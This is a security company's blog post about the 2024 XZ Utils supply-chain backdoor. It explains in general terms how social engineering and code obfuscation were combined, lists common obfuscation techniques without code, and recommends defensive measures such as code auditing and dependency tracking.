• Home
  • /Learn
  • /XZ Utils Attack: Combining Social Engineering and Code Obfuscation
background image

Blog

XZ Utils Attack: Combining Social Engineering and Code Obfuscation

certification

What do Social Engineering [CAPEC-403] and Code Obfuscation [T-T1027.010] have in common? Well, for starters, both are tactics for masking an attacker's true intentions - they are both covert techniques. Social engineering attacks hide the malicious intent of a social interaction while obfuscated code hides the malicious intent of source code. These two techniques can be used Independently, but combined they form a powerful double punch and a common trajectory used by attackers. Social engineering techniques are used to get software code into the victim's possession and code obfuscation ensures its malicious intent cannot be easily detected via manual inspection or even using automated cybersecurity tools.

Recently, social engineering and code obfuscation were both part of a supply chain cyber attack against the XZ Utils compression library used in many Linux, macOS, and since version 5.0, Microsoft Windows. We have already covered several aspects of social engineering on the Packetlabs blog. In this article we will cover the offensive tactic of code obfuscation, list various methods of code obfuscation and how they are used by attackers, and quickly review how organizations can keep themselves safe from both code obfuscation and supply chain attacks.

What Happened In the XZ Hack?

In March 2024, CVE-2024-3094 was published disclosing an exploitable vulnerability in the liblzma component of XZ Utils with the highest possible CVSS severity score: 10 Critical. According to security advisories, certain data being submitted to the XZ data decompression library could result in arbitrary local code execution for an attacker. 

The described backdoor in the XZ Utils, specifically affecting systems using sshd, hijacks the ssh authentication process when a single specific private key is used. Additionally, this backdoor is designed with a killswitch, enabling the attacker to deactivate the vulnerability remotely.

The discovery came about when Microsoft developer Andres Freund noticed performance issues during SSH logins on Debian sid installations, which led him to investigate further. His inquiry revealed that the upstream tarballs of the XZ Utils, specifically versions 5.6.0 and 5.6.1, contained malicious code. An investigation into how this malicious code became part of the XZ Utils package, uncovered a sophisticated social engineering attack against the package maintainers to exploit the software supply chain. The campaign is believed to have been facilitated by a state-sponsored actor who had infiltrated the project over several years​.

Other than the sense of urgency to include the malicious code, the attackers used Code Obfuscation to try and hide the malicious code's intention. In fact, it was a very simple process that extracted specific non-sequential bytes from the user submitted data, and directly executed it as a shell command [CWE-78].

Methods Of Code Obfuscation

Code obfuscation (aka source code obfuscation or command obfuscation) is a cyber attack tactic that tries to hide the true content of source code in order to impede detection by automated tools such as malware scanners or human detection. Ultimately, adversaries want to make malicious software difficult to analyze by encrypting, encoding, or using another technique to obfuscate it. 

Here we will look at specific techniques used to obfuscate programming code from being easily readable:

  • Encoding: Encoding involves transforming data into a different format typically using a well known scheme that can be easily reversed such as Base64 encoding, where binary data is converted into ASCII characters, or data compression such as ZIP or GZIP. Encoding makes it harder to look for potentially malicious code using simple text-based scanners or manual inspection. The encoded data is usually decoded when at runtime to uncover its plaintext code into memory and executed. Encoding schemes can be easily reversed and some automated Source Code Analysis (SCA) tools will look for Base64 encoded strings, decode them and analyze their contents

  • Encryption: Encryption involves converting data into a secret code to prevent access. This can range from simple encryption methods like ROT-13 (a Caesar cipher with a fixed shift of 13) to more complex algorithms like AES (Advanced Encryption Standard) or RSA (Rivest-Shamir-Adleman) public key encryption. Encrypted data is much harder to decipher without the correct decryption key, providing stronger protection against analysis and detection

  • Complex code style: Making an application or script's code structure complex is another common technique used to confound security researchers and delay malware analysis efforts. Making variable names meaningless characters, creating a very complex logical flow, and adding unnecessary code with useless functionality take time to reverse engineer to clarify the ultimate purpose of the code

  • Dynamic Execution: This technique involves code that only reveals its true nature or executes under specific conditions or environments. This can prevent analysis tools that do not mimic the end-user environment from seeing the malicious behavior. Dynamic execution might involve checking for the presence of a debugger or virtual machine before executing the malicious activities

  • Use of Compilers and Packers: Packers compress, encrypt, or modify a program’s binary to obscure its contents. Upon execution, the packer code decompresses or decrypts the original executable code in memory, which makes static analysis very difficult. Packers are often used in conjunction with other obfuscation techniques to create layers of obfuscation

  • Dead Code Insertion: Involves inserting code that does nothing or is never actually called within the program’s execution path. This can confuse and slow down an analyst or automated tool trying to trace important execution paths or determine the purpose of the code

  • String Obfuscation: String obfuscation involves altering readable strings in the code that might give hints about code functionality. Strings can be encoded, encrypted, or broken into a very large number of smaller parts scattered throughout the codebase. This reduces the likelihood that simple searches within the code will reveal its intent or operation

Mitigating The Threat Of Code Obfuscation

To an experienced software engineer, obfuscated software code is generally obvious because it violates many good coding practices such as writing clean and dry code. Also, sections of encoded, compressed, or encrypted data that is decoded and used in the software should always be inspected to determine what is being executed.

To effectively counteract the risks posed by code obfuscation, especially in the context of sophisticated software supply chain attacks like the XZ Utils case, organizations can employ a multi-layered security strategy. Here are some key mitigation actions:

  • Rigorous Code Auditing: Regularly conduct thorough code reviews and audits to check for any anomalies or unusual coding patterns that might suggest obfuscation. Utilize automated tools that can detect obfuscated code by analyzing control flow, string literals, and metadata

  • Tracking Software Dependencies: Implement strict monitoring of all software dependencies, including third-party libraries and tools, to detect any unauthorized changes or additions to the code base

  • Secure Development Practices: Train developers on secure coding practices and the risks associated with importing unverified code. Encourage the use of well-known and trusted libraries over less popular alternatives

  • Vendor Risk Management: Establish a robust vendor risk management process that includes the vetting of all contributors to your codebase and maintaining a verified list of contributors, which can help prevent social engineering attacks

  • Patch Management: Ensure timely application of security patches and updates to all software components, reducing the window of opportunity for attackers to exploit known vulnerabilities

  • Integration of Advanced Detection Tools: Use advanced malware detection systems that are capable of identifying obfuscated code by employing machine learning techniques and behavioral analysis to understand the intent behind the code rather than just its appearance

Conclusion

The cybersecurity landscape revolves around executing malicious code without authorization to achieve the attacker's goals. The combination of social engineering and code obfuscation presents an especially common and powerful means to achieve this and a formidable challenge to defend against. The XZ Utils attack highlights how long term social engineering campaigns can lead to inclusion of malware in the global open-source supply chain. By blending in code obfuscation, attackers can increase their chances for success as busy developers may not take the time to fully assess complex code.

Organizations must recognize the dual threat posed by these techniques and respond with comprehensive security strategies that address both human and technical vulnerabilities. Strengthening code integrity checks, enhancing employee training on social engineering, and employing advanced detection mechanisms are critical to defending against these sophisticated attacks. As the landscape of threats continues to evolve, so too must the defenses that protect our critical software infrastructures.

Sign up for our newsletter

Get the latest blog posts in your inbox biweekly!